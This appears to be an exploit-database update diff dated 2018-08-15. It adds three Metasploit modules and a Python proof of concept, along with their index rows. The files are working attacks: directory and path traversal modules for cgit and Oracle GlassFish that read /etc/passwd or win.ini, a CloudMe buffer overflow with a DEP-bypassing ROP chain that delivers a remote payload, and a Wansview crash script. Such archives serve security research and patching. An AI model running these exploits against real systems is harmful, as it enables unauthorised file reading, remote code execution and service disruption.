DB: 2018-08-15

4 changes to exploits/shellcodes

Wansview 1.0.2 - Denial of Service (PoC)

Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
cgit 1.2.1 - Directory Traversal (Metasploit)
Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)

exploits/linux/webapps/45195.rb

@@ -0,0 +1,78 @@
+# Title: cgit 1.2.1 - Directory Traversal (Metasploit)
+# Author: Dhiraj Mishra
+# Software: cgit
+# Link: https://git.zx2c4.com/cgit/
+# Date: 2018-08-14
+# CVE: CVE-2018-14912
+# This module exploits a directory traversal vulnerability which exists 
+# in cgit < 1.2.1 cgit_clone_objects(), reachable when the configuration 
+# flag enable-http-clone is set to 1 (default).
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'cgit Directory Traversal',
+      'Description' => %q{
+        This module exploits a directory traversal vulnerability which
+        exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the
+        configuration flag enable-http-clone is set to 1 (default).
+      },
+      'References'  =>
+        [
+          ['CVE', '2018-14912'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'],
+          ['EDB', '45148']
+        ],
+      'Author'      =>
+        [
+          'Google Project Zero', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => 'Aug 03 2018',
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+        OptString.new('TARGETURI', [true, "The base URI path of the cgit install", '/cgit/']),
+        OptString.new('REPO', [true, "Git repository on the remote server", '']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "../" * datastore['DEPTH'] << filename
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, datastore['REPO'], '/objects/'),
+      'vars_get' => {'path' => traversal}
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - \n#{res.body}")
+    path = store_loot(
+      'cgit.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end

exploits/windows/webapps/45196.rb

@@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        which exits in administration console of Oracle GlassFish Server 4.1, which is
+        listening by default on port 4848/TCP.
+      },
+      'References'  =>
+        [
+          ['CVE', '2017-1000028'],
+          ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
+          ['EDB', '39441']
+        ],
+      'Author'      =>
+        [
+          'Trustwave SpiderLabs', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => 'Aug 08 2015',
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(4848),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "%c0%af.." * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/theme/META-INF/prototype#{traversal}"
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'oracle.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end

exploits/windows_x86-64/local/45194.py

@@ -0,0 +1,25 @@
+# Exploit Title: Wansview 1.0.2 - Denial of Service (PoC)  
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-14
+# Software Link: http://www.wansview.com/uploads/soft/Wansview_v1.0.2.exe
+# Tested Version: 1.0.2
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the Wansview program. Now click "Add Camera" and in the new 
+# window paste the content of "exploit.txt" into the following fields:
+# "Camera name" & "DID number". Click "Add" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 2000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86-64/remote/45197.rb

@@ -0,0 +1,92 @@
+# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
+# Date: 2018-08-13
+# Exploit Author: Raymond Wellnitz
+# Vendor Homepage: https://www.cloudme.com
+# Version: 1.8.x/1.9.x
+# Tested on: Windows 7 x64
+# CVE : 2018-6892
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',
+      'Description'    => %q{
+          This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.
+      },
+      'Author'         => [ 'Raymond Wellnitz' ],
+      'References'     =>
+        [
+          [ 'CVE', 'CVE-2018-6892' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Platform'       => 'win',
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'Space'    => 600,
+          'BadChars' => "\x00"
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86_32/64',   		{ 'Ret' => 0x6cfa88a2  } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => '11.02.2018'))
+
+    register_options([ Opt::RPORT(8888) ])
+  end
+
+def create_rop_chain()
+    rop_gadgets = [
+      0x6cf98182,  # POP EAX # RETN [icuin49.dll]
+      0x68c848d8,  # ptr to &VirtualProtect() [IAT Qt5Core.dll]
+      0x61b4d226,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll] 
+      0x668d8261,  # XCHG EAX,ESI # RETN [libGLESv2.dll] 
+      0x68a5c297,  # POP EBP # RETN [Qt5Core.dll]      
+      0x688dd45d,  # & JMP ESP [Qt5Core.dll]
+      0x68abe868,  # POP EAX # RETN [Qt5Core.dll]
+      0xfffffdff,  # 201
+      0x1004b263,  # NEG EAX # RETN [LIBEAY32.dll]
+      0x689687d2,  # XCHG EAX,EBX # RETN
+      0x68abe868,  # POP EAX # RETN [Qt5Core.dll]
+      0xffffffc0,  # 40
+      0x1004b263,  # NEG EAX # RETN [LIBEAY32.dll]
+      0x6751d479,  # XCHG EAX,EDX # RETN [icuuc49.dll]
+      0x100010c7,  # POP ECX # RETN [LIBEAY32.dll]
+      0x6494ea0a,  # &Writable location [libwinpthread-1.dll]
+      0x68a49534,  # POP EDI # RETN [Qt5Core.dll] 
+      0x1008df82,  # RETN (ROP NOP) [LIBEAY32.dll]
+      0x68ad025b,  # POP EAX # RETN [Qt5Core.dll]
+      0x90909090,  # NOPS
+      0x6759bdb4,  # PUSHAD # RETN [icuuc49.dll] 
+    ].flatten.pack("V*")
+    return rop_gadgets
+end
+
+  def exploit
+    connect
+
+    sploit = rand_text_alpha_upper(1036)
+    sploit << create_rop_chain()
+    sploit << make_nops(30)
+    sploit << payload.encoded
+
+    print_status("Trying target #{target.name}...")
+    sock.put(sploit + "\r\n\r\n")
+
+    handler
+    disconnect
+  end
+end

files_exploits.csv

@@ -9871,6 +9871,7 @@ id,file,description,date,author,type,platform,port
 45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86,
 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
 45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
+45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16686,6 +16687,7 @@ id,file,description,date,author,type,platform,port
 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
+45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39793,3 +39795,5 @@ id,file,description,date,author,type,platform,port
 45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
 45179,exploits/php/webapps/45179.txt,"MyBB Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,
 45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
+45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
+45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848